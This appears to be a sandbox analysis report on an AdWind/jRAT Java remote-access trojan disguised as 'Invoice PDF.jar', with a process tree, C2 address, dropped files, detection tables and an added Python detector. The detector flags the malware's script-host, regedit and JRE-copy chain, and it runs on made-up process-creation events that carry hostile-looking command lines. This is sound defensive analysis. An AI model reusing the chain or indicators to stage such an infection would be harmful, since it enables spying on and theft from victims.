          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe: Dropped file: the same AntiVirusProduct script as above
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe: Dropped file: the same FirewallProduct script as above
          Yara detected AdWind RAT
          Source: Yara match; File source: Process Memory Space: java.exe PID: 4596, type: MEMORY
          Yara detected AdWind RATs dll
          Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll, type: DROPPED
          Source: Yara match; File source: 10.2.java.exe.4881274.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 9.2.javaw.exe.740d0000.8.unpack, type: UNPACKEDPE
          Java source code contains strings found in CrossRAT
          Source: jhxromh.txt.5.dr: Suspicious string: operational.JRat (in operational/Jrat.java)
          Source: _0.5473048333189129536838706564981496.class.9.dr: Suspicious string: operational.JRat (in operational/Jrat.java)
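
The execution chain the report documents (java.exe launching wscript.exe/cscript.exe on a Retrive<digits>.vbs in %TEMP%, wscript.exe launching regedit.exe on a dropped .reg file, xcopy.exe copying the JRE into AppData\Roaming\Oracle, all under a Java ancestor) is the part of this sample that survives re-obfuscation of the JAR, so it is the part worth detecting on process-creation telemetry. The script below is an added example written for this page, not tooling from the sandbox or from the malware. The events are constructed: pids are made up, command lines are assembled from the image names and paths the report lists, and the location of the .reg file and the javaw.exe command line are assumptions; the rule names are my own.

```python
import re

# Constructed process-creation events shaped like the report's process tree.
# pids/ppids are invented; images and paths are the ones the report lists.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c "C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe" -jar "Invoice PDF.jar"'},
    {"pid": 101, "ppid": 100, "image": r"C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe",
     "cmdline": r'java.exe -jar "C:\Users\user\Desktop\Invoice PDF.jar"'},
    {"pid": 102, "ppid": 101, "image": r"C:\Windows\SysWOW64\wscript.exe",
     "cmdline": r"wscript C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs"},
    # the report does not give the .reg file's directory; Temp is an assumption
    {"pid": 103, "ppid": 102, "image": r"C:\Windows\SysWOW64\regedit.exe",
     "cmdline": r"regedit /s C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg"},
    # javaw.exe command line is an assumption (SERVER_PATH from the config)
    {"pid": 104, "ppid": 102, "image": r"C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe",
     "cmdline": r"javaw.exe -jar C:\Users\user\AppData\Roaming\jhxromh.txt"},
    {"pid": 105, "ppid": 104, "image": r"C:\Windows\SysWOW64\xcopy.exe",
     "cmdline": r'xcopy "C:\Program Files (x86)\Java\jre1.8.0_211" "C:\Users\user\AppData\Roaming\Oracle\" /E'},
    {"pid": 106, "ppid": 104, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r"cmd.exe /c cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs"},
    {"pid": 107, "ppid": 106, "image": r"C:\Windows\SysWOW64\cscript.exe",
     "cmdline": r"cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs"},
    # benign noise: an admin script from a share, no Java ancestor
    {"pid": 200, "ppid": 1,   "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": r"cscript.exe \\fileserver\it\inventory.vbs"},
]

JAVA = re.compile(r"\\javaw?\.exe$", re.I)
SCRIPT_HOST = re.compile(r"\\[wc]script\.exe$", re.I)
TEMP_VBS = re.compile(r"\\AppData\\Local\\Temp\\Retrive\d+\.vbs", re.I)
REGEDIT = re.compile(r"\\regedit\.exe$", re.I)
USER_REG_FILE = re.compile(r"\\Users\\[^\\]+\\.*\.reg\b", re.I)
JRE_COPY_DEST = re.compile(r"\\AppData\\Roaming\\Oracle\\", re.I)


def has_java_ancestor(event, by_pid, max_depth=8):
    """Walk the parent chain; cmd.exe hops in between (as in the report) are fine.
    Stops at the first java.exe/javaw.exe, at an unknown parent, or at max_depth
    so a pid-reuse loop cannot hang the walk."""
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            return False
        if JAVA.search(parent["image"]):
            return True
        cur = parent
    return False


def detect(events):
    """Return (rule, pid) for every event matching one of the chain's stages."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = e["image"], e["cmdline"]
        java_parent = has_java_ancestor(e, by_pid)
        if SCRIPT_HOST.search(img) and TEMP_VBS.search(cmd) and java_parent:
            hits.append(("temp_vbs_from_java", e["pid"]))
        if REGEDIT.search(img) and USER_REG_FILE.search(cmd) and java_parent:
            hits.append(("regedit_import_from_java", e["pid"]))
        if img.lower().endswith("\\xcopy.exe") and JRE_COPY_DEST.search(cmd) and java_parent:
            hits.append(("jre_copy_to_roaming", e["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:26} pid={pid}")
```

The Java-ancestor requirement is what keeps the rule quiet: script hosts and regedit are common on workstations, but a JRE process two hops up the tree is not. Run against the constructed events it flags the two script-host executions, the regedit import and the JRE copy, and ignores the share-hosted inventory script.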

          Mitre Att&ck Matrix

          Techniques are listed per tactic column, top row first. A number in parentheses is the report's signature-count badge for that technique, copied as rendered in the flattened source; entries without a badge are the matrix template's cells with no observation for this sample.

          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
          Execution: Windows Management Instrumentation (11); Command and Scripting Interpreter (2); Scripting (11); Exploitation for Client Execution (1); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
          Persistence: Services File Permissions Weakness (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Privilege Escalation: Process Injection (12); Services File Permissions Weakness (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
          Defense Evasion: Masquerading (21); Modify Registry (1); Virtualization/Sandbox Evasion (1); Disable or Modify Tools (11); Process Injection (12); Scripting (11); Obfuscated Files or Information (1); Services File Permissions Weakness (1)
          Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
          Discovery: Query Registry (1); Security Software Discovery (231); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Network Sniffing; Network Service Scanning
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
          Collection: Archive Collected Data (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
          Command and Control: Encrypted Channel (1); Non-Standard Port (1); Remote Access Software (2); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
          Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
          Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
          Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 392877   Sample: Invoice PDF.jar   Start date: 19/04/2021   Architecture: WINDOWS   Score: 100

          Signatures attached to the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures

          Process tree (flattened from the interactive graph; the numbers are the graph's node ids, nesting shows which process started which):

          2    Invoice PDF.jar (start)
          11   cmd.exe
               13   java.exe
                    17   wscript.exe
                         dropped: C:\Users\user\...\ebgeaegdbdecaedfebace.reg (ASCII)
                         signature: Uses regedit.exe to modify the Windows registry
                         25   javaw.exe
                              network: 107.175.101.209 ports 49739, 49774, 49786 (NEXEONUS, United States); 192.168.2.1 (unknown)
                              dropped: C:\Users\...\Windows9046764930049020633.dll (PE32); C:\Users\...\Windows278170804881636675.dll (PE32); C:\Users\...\Retrive7530640457785674935.vbs (ASCII); 2 other files (1 malicious)
                              signature: Tries to harvest and steal browser information (history, passwords, etc)
                              34   xcopy.exe
                                   dropped: C:\Users\user\AppData\Roaming\...\zip.dll (PE32); C:\Users\user\AppData\...\wsdetect.dll (PE32); C:\Users\user\AppData\...\w2k_lsa_auth.dll (PE32); 128 other files (none is malicious)
                              37   java.exe
                                   network: 127.0.0.1 (unknown)
                                   dropped: C:\Users\...\Retrive9101275134933643330.vbs (ASCII); C:\Users\...\Retrive7965693575833183651.vbs (ASCII)
                                   44   cmd.exe
                                        62   conhost.exe
                                        64   cscript.exe
                                   46   cmd.exe
                                        66   conhost.exe
                                        68   cscript.exe
                                   48   cmd.exe
                                        70   conhost.exe
                                   50   conhost.exe
                              40   cmd.exe
                                   52   conhost.exe
                                   54   cscript.exe
                              42   4 other processes
                                   56   conhost.exe
                                   58   cscript.exe
                                   60   conhost.exe
                         30   regedit.exe
                    21   icacls.exe
                         32   conhost.exe
               15   conhost.exe
                    23   conhost.exe


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Invoice PDF.jar | 12% | Virustotal |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs | 100% | Avira | VBS/Agent.276
          C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | 100% | Avira | TR/Spy.Agent.lusda
          C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs | 100% | Avira | VBS/Agent.276
          C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs | 100% | Avira | VBS/Agent.281
          C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs | 100% | Avira | VBS/Agent.281
          C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll | 100% | Avira | TR/Spy.Agent.3850
          C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | 75% | Metadefender |
          C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll | 74% | ReversingLabs | Win32.Trojan.AdWind
          C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll | 49% | Metadefender |
          C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll | 66% | ReversingLabs | Win32.Trojan.AdWind
          C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll | 0% | ReversingLabs |
          C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll | 3% | ReversingLabs |
          C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll | 0% | Metadefender |
          C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll | 3% | ReversingLabs |
          C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll | 0% | Metadefender |
          C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll | 3% | ReversingLabs |
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll | 0% | Metadefender |
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll | 0% | ReversingLabs |
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll | 0% | Metadefender |
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll | 0% | ReversingLabs |
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll | 0% | Metadefender |
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll | 0% | ReversingLabs |

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          (URLs are the strings exactly as found in memory, trailing garbage included; a row marked (xN) was listed N times in the original table, once per reputation lookup.)
          http://javax.xml.XMLConstants/property/accessExternalDTDS | 0% | Avira URL Cloud | safe
          http://www.chambersign.org1 | 0% | URL Reputation | safe (x4)
          http://java.sun.com/xml/dom/properties/ | 0% | Virustotal |
          http://java.sun.com/xml/dom/properties/ | 0% | Avira URL Cloud | safe
          https://jrat.ioS | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/dom/properties/; | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0 | 0% | Avira URL Cloud | safe
          http://policy.camerfirma.com0 | 0% | URL Reputation | safe (x3)
          http://java.sun.com/xml/stream/properties/ignore-external-dtd | 0% | Avira URL Cloud | safe
          http://www.certplus.com/CRL/class2.crl | 0% | URL Reputation | safe (x3)
          http://bugreport.sun.com/bugreport/ | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/dom/properties/c | 0% | Avira URL Cloud | safe
          http://cps.chambersign.org/cps/chambersroot.html | 0% | URL Reputation | safe (x3)
          http://www.certplus.com/CRL/class3P.crl | 0% | URL Reputation | safe (x3)
          http://java.sun.com/xml/stream/properties/reader-in-defined-stateodeIter | 0% | Avira URL Cloud | safe
          http://javax.xml.XMLConstants/property/accessExternalDTD3 | 0% | Avira URL Cloud | safe
          http://crl.securetrust.com/STCA.crl | 0% | URL Reputation | safe (x3)
          http://javax.xml.XMLConstants/property/accessExternalDTD; | 0% | URL Reputation | safe (x3)
          http://java.sun.com/dtd/properties.dtdk | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/dom/properties/ancestor-check | 0% | Avira URL Cloud | safe
          http://ops.com.pa/jre7.zipW | 0% | Avira URL Cloud | safe
          http://gG2DwoT3pJewMEBGx6.com | 0% | Avira URL Cloud | safe
          http://javax.xml.XMLConstants/property/ | 0% | URL Reputation | safe (x3)
          http://java.sun.com/xml/dom/properties/ancestor-checkurr | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/dom/properties/ancestor-check3C | 0% | Avira URL Cloud | safe
          http://ops.com.pa/jre7.zip | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/stream/properties/3p | 0% | Avira URL Cloud | safe
          https://jrat.io | 0% | Avira URL Cloud | safe
          http://javax.xml.XMLConstants/property/accessExternalSchemaD | 0% | URL Reputation | safe (x3)
          http://javax.xml.XMLConstants/property/s3 | 0% | Avira URL Cloud | safe
          http://java.sun.com/xml/stream/properties/reader-in-defined-state | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://apache.org/xml/properties/internal/validator/schema#8 | java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | false | - | high
          http://javax.xml.XMLConstants/property/accessExternalDTDS | java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://apache.org/xml/properties/internal/entity-resolvert | javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/validation/schema/augment-psvi | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/validation/schemaK~ | java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/entity-resolvers | java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | false | - | high
          http://maven.apache.org/POM/4.0.0 | javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592336171.0000000004ECE000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/input-buffer-size | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/validation/balance-syntax-trees# | java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://www.chambersign.org1 | javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp | false | URL Reputation: safe (x4) | unknown
          http://apache.org/xml/features/standard-uri-conformant2 | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/document-scanner/apach7 | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://repository.swisssign.com/0 | javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/schema/external-schemaLocation( | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/entity-manager | javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | false | - | high
          http://www.oracle.com/feature/use-service-mechanism/w3c/ | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/symbol-tableQ | javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/internal/parser-settings | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/dtd-scannerl.o8 | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/dom/include-ignorable-whitespace | javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | false | - | high
          http://xml.org/sax/features//dom | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | false | - | high
          http://java.sun.com/xml/dom/properties/ | javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
          http://apache.org/xml/properties/internal/stax-entity-resolver | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/dom/current-element-node# | java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | false | - | high
          http://xml.org/sax/features/0co | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/ | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/nonvalidating/load-external-dtdnt: | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          https://jrat.ioS | java.exe, 0000000A.00000002.592979586.0000000009E5B000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://apache.org/xml/features/3 | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://www.oracle.com/feature/use-service-mechanismrg/ap | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/xinclude/fixup-base-uris | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocation | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/error-reporter | javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/internal/tolerate-duplicatesKR | java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/security-managerk | java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/features/validation/warn-on-duplicate-attdefttp://D | java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp | false | - | high
          http://xml.org/sax/properties/( | javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp | false | - | high
          http://apache.org/xml/properties/internal/document-scannerKS | java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | - | high
          http://java.sun.com/xml/dom/properties/; | java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://apache.org/xml/features/include-comments | javaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmp | false | - |
                                                                                high
                                                                                http://apache.org/xml/features/scanner/notify-char-refsjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  http://apache.org/xml/features/warn-on-duplicate-entitydef-node-java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                    high
                                                                                    http://apache.org/xml/properties/dom/current-element-node9java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                      high
                                                                                      http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://policy.camerfirma.com0javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      http://apache.org/xml/features/validation/schema/normalized-valueBjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                                                                        high
                                                                                        http://java.sun.com/xml/stream/properties/ignore-external-dtdjava.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://apache.org/xml/features/continue-after-fatal-errorjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                                                                                          high
                                                                                          http://apache.org/xml/features/standard-uri-conformantjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                            high
                                                                                            http://apache.org/xml/properties/internal/document-scannerjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                                                                                              high
                                                                                              http://www.certplus.com/CRL/class2.crljavaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.590748343.00000000048DE000.00000004.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.333098127.000000000531A000.00000004.00000001.sdmp, java.exe, 00000002.00000002.333182589.000000000A3C4000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592486010.0000000009F91000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592199343.0000000009B8A000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://java.sun.com/xml/dom/properties/cjava.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              http://java.oracle.com/java.exe, 00000002.00000002.333196283.000000000A3D5000.00000004.00000001.sdmp, java.exe, 00000002.00000002.333114203.0000000005332000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592505653.0000000009F97000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592212742.0000000009B8F000.00000004.00000001.sdmpfalse
                                                                                                high
                                                                                                http://xml.org/sax/features/namespace-prefixesnt(java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://apache.org/xml/features/javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://apache.org/xml/features/generate-synthetic-annotationsjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://xml.org/sax/features/allow-dtd-events-after-endDTDjavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                                                                                        high
